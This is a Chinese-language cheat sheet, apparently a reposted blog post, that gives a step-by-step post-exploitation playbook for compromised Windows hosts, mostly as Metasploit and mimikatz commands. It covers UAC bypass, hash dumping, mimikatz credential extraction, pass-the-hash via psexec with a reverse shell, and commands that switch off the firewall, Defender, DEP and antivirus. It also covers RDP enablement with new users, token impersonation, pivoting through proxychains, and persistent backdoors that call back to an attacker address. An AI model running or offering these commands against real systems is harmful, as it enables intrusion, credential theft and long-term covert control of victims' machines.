后渗透流程【建议收藏】

后渗透流程 权限提升 绕过UAC msf模块 Exploit/windows/local/bypassuac Exploit/windows/local/bypassuac_injection Exploit/windows/local/bypassuac_vbs 系统提权 提高程序运行级别 msf模块（Exploit/windows/local/ask） 缺点：需要uac交互 后渗透信息收集 msf模块（post） 获取目标主机的分区情况：post/windows/gather/forensics/enum_drives 判断是否为虚拟机： post/windows/gather/checkvm 开启了哪些服务： post/windows/gather/enum_applications 查看共享： post/windows/gather/enum_shares 获取主机最近的系统操作： post/windows/gather/dumplinks 查看补丁： post/windows/gather/enum_applicationsenum_patches scraper脚本 路径：/usr/share/metasploit-framework/scripts/meterpreter (meterpreter下run scraper) 保存信息的目录：/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx winenum脚本(meterpreter下run winenum) 数据包抓获 目的：抓获与外围的交互 使用地点：找不到进入内网的方法（主机在防火墙，开放端口少，是服务器的子网） 抓包 sniffer会过滤掉自身merterpreter产生的流量，直接去抓取和主机相关的数据包信息 加载sniffer:load sniffer 查看网卡信息；sniffer_interfaces 开启监听：sniffer_start 1 导出数据包：sniffer_dump 1 1.cap 解包 auxiliary/sniffer/psnuffle meterpreter模块 run packetrecorder run post/windows/manage/rpcapd_start 抓hash 基础：密码格式： 用户名称：RID：LM-HASH值：NT-HASH值 hashdump run post/windows/gather/smart_hashdump 检查权限和系统类型 检查是否是域控制服务器 从注册表读取hash,注入lsass进程 如果是08server并且具有管理员权限，直接getsystem尝试提权 如果是win7且UAC关闭并具有管理员权限，从注册表读取 03/XP直接getsystem,从注册表读取hash mimikatz(已集合到mimikatz) 需要administrator及以上权限，需要免杀 privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码（如果可以的话） sekurlsa::ekeys #获取kerberos加密凭证 hash破解 Hashcat 文章： （https://www.anquanke.com/post/id/177123） hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force hash传递攻击 UAC注册表： HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System 进shell，中文乱码，输入chcp 65001 shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f MSF exploit/windows/smb/psexec use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128 set RHOST 192.168.206.101 set SMBUser administrator set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0 exploit mimikkatz sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 关闭防火墙及杀毒软件 -关闭防火墙(shell) - Netsh advfirewall set allprofiles state off(管理员及以上权限) 关闭Denfender(shell) Net stop windefend 关闭DEP(shell) Bcdedit.exe /set {current} nx AlwaysOff 关闭杀毒软件(meterpreter) Run killav Run post/windows/manage/killava 远程桌面 开启远程桌面 run post/windows/manage/enable_rdp（方式一） run getgui -e （方式二） run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt(关闭远程桌面) 开启远程桌面并添加新用户 run getgui -u root -p pass 开启远程桌面并绑定在8888端口 - `run getgui -e -f 8888` 截图 load espia screengrab 远程桌面连接 kali下：rdesktop -u root -p 123 192.168.85.157 令牌假冒 windows安全相关概念 session Windows Station Desktop Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限 incognito load incognito list_tokens -u (非交互的token多出来一条EAAdministrator) impersonate_token EAAdministrator 成功登陆 跳板攻击 pivoting 利用已经被入侵的主机作为跳板来攻击网络中其他系统 访问由于路由问题而不能直接访问的内网系统 添加路由 方式一：run autoroute -s 192.168.102.0/24 方式二：run post/multi/manage/autoroute(更新) 利用win7攻击内网服务器 扫描内网网络 run post/windows/gather/arp_scanner rhosts=192.168.102.0/24 use auxiliary/scanner/portscan/tcp ProxyChains代理设置 配置：vim /etc/proxychain.conf(加上ip) Socket代理 auxiliary/server/socks4a ProxyChains ProxyChains是为GUNLinux操作系统而开发的工具，任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式，诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。 proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx 后门植入 meterpreter后门：Metsvc 通过服务启动 run metsvc -A #设定端口，上传后门文件 meterpreter后门：persistence 通过启动型启动 特性：定期会连，系统启动时回连，自动运行 run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111 原文：https://blog.csdn.net/weixin_44255856/article/details/103464504?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-3.baidujs&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-3.baidujs